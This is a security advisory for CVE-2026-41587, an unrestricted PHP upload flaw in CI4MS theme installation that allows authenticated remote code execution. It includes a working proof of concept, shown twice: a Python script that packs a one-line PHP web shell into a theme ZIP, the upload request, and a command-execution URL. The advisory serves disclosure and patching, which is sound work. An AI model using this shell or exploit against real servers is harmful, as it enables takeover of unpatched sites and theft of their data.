GHSA-FW49-9XQ4-GMX6
Vulnerability from github – Published: 2026-04-29 20:42 – Updated: 2026-05-08 19:55Summary
A theme upload feature allows any authenticated backend user with theme-upload permission to achieve remote code execution (RCE) by uploading a crafted ZIP file. PHP files inside the ZIP are installed into the web-accessible public/ directory with no extension or content filtering, making them directly executable via HTTP.
Details
File: modules/Theme/Controllers/Theme.php
After a ZIP is uploaded and extracted to a temporary directory, install_theme_from_tmp() is called unconditionally: Theme.php:51-52
File: modules/Theme/Helpers/themes_helper.php
The helper copies every file matching . from public/templates/<name>/ inside the ZIP directly into public/templates/<name>/ on disk using rename(), with no file-extension allowlist, no MIME check, and no content inspection: themes_helper.php:60-68
Because the web root is public/, any .php file placed there is directly reachable over HTTP.
PHP files are also installed — without filtering — into app/Controllers/templates//, app/Libraries/templates//, and other app/ subdirectories: themes_helper.php:31-42
The theme name is derived from the uploaded filename via str_replace('_theme.zip', '', $file->getName()), so uploading evil_theme.zip sets the theme name to evil and the install target to public/templates/evil/: Theme.php:20
PoC
Prerequisites: A backend account with theme upload permission (e.g., backend/themes/upload).
Step 1 — Build the malicious ZIP:
import zipfile, io
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as z:
z.writestr('public/templates/evil/shell.php', '<?php system($_GET["c"]); ?>')
buf.seek(0)
with open('evil_theme.zip', 'wb') as f:
f.write(buf.read())
Step 2 — Upload:
POST /backend/themes/upload
Content-Type: multipart/form-data
field name: theme
file: evil_theme.zip
Step 3 — Execute:
GET https://target.com/templates/evil/shell.php?c=id
Expected response: output of id (e.g., uid=33(www-data) gid=33(www-data) groups=33(www-data)).
Impact
Type: Authenticated Remote Code Execution (RCE) via arbitrary file write to the web root.
Who is impacted: Any deployment where a backend user has been granted theme upload permission. A superadmin already has full access, but any lower-privileged role granted this permission can use it to write and execute arbitrary PHP on the server, gaining OS-level command execution under the web server process. This can be used for data exfiltration, lateral movement, persistence, or full server compromise.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.31.6.0"
},
"package": {
"ecosystem": "Packagist",
"name": "ci4-cms-erp/ci4ms"
},
"ranges": [
{
"events": [
{
"introduced": "0.26.0.0"
},
{
"fixed": "0.31.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41587"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-29T20:42:44Z",
"nvd_published_at": "2026-05-07T04:16:27Z",
"severity": "HIGH"
},
"details": "### Summary\nA theme upload feature allows any authenticated backend user with theme-upload permission to achieve remote code execution (RCE) by uploading a crafted ZIP file. PHP files inside the ZIP are installed into the web-accessible public/ directory with no extension or content filtering, making them directly executable via HTTP.\n\n\n### Details\nFile: `modules/Theme/Controllers/Theme.php`\n\nAfter a ZIP is uploaded and extracted to a temporary directory, install_theme_from_tmp() is called unconditionally: Theme.php:51-52\n\nFile: `modules/Theme/Helpers/themes_helper.php`\n\nThe helper copies every file matching *.* from `public/templates/\u003cname\u003e/` inside the ZIP directly into `public/templates/\u003cname\u003e/` on disk using rename(), with no file-extension allowlist, no MIME check, and no content inspection: `themes_helper.php:60-68`\n\nBecause the web root is `public/`, any `.php` file placed there is directly reachable over HTTP.\n\nPHP files are also installed \u2014 without filtering \u2014 into app/Controllers/templates/\u003cname\u003e/, app/Libraries/templates/\u003cname\u003e/, and other app/ subdirectories: `themes_helper.php:31-42`\n\nThe theme name is derived from the uploaded filename via `str_replace(\u0027_theme.zip\u0027, \u0027\u0027, $file-\u003egetName())`, so uploading `evil_theme.zip` sets the theme name to evil and the install target to `public/templates/evil/`: `Theme.php:20`\n\n### PoC\nPrerequisites: A backend account with theme upload permission (e.g., backend/themes/upload).\n\nStep 1 \u2014 Build the malicious ZIP:\n```\nimport zipfile, io \n \nbuf = io.BytesIO() \nwith zipfile.ZipFile(buf, \u0027w\u0027) as z: \n z.writestr(\u0027public/templates/evil/shell.php\u0027, \u0027\u003c?php system($_GET[\"c\"]); ?\u003e\u0027) \nbuf.seek(0) \nwith open(\u0027evil_theme.zip\u0027, \u0027wb\u0027) as f: \n f.write(buf.read())\n```\nStep 2 \u2014 Upload:\n```\nPOST /backend/themes/upload \nContent-Type: multipart/form-data \n \nfield name: theme \nfile: evil_theme.zip \n```\nStep 3 \u2014 Execute:\n```\nGET https://target.com/templates/evil/shell.php?c=id \n```\nExpected response: output of id (e.g., uid=33(www-data) gid=33(www-data) groups=33(www-data)).\n\n\n### Impact\nType: Authenticated Remote Code Execution (RCE) via arbitrary file write to the web root.\n\nWho is impacted: Any deployment where a backend user has been granted theme upload permission. A superadmin already has full access, but any lower-privileged role granted this permission can use it to write and execute arbitrary PHP on the server, gaining OS-level command execution under the web server process. This can be used for data exfiltration, lateral movement, persistence, or full server compromise.",
"id": "GHSA-fw49-9xq4-gmx6",
"modified": "2026-05-08T19:55:29Z",
"published": "2026-04-29T20:42:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fw49-9xq4-gmx6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41587"
},
{
"type": "WEB",
"url": "https://github.com/ci4-cms-erp/ci4ms/commit/b969465e71eacd9eb57014ad1fce1fc34fa7bca0"
},
{
"type": "PACKAGE",
"url": "https://github.com/ci4-cms-erp/ci4ms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CI4MS has Unrestricted PHP File Upload via Theme Installation that Leads to Authenticated Remote Code Execution"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.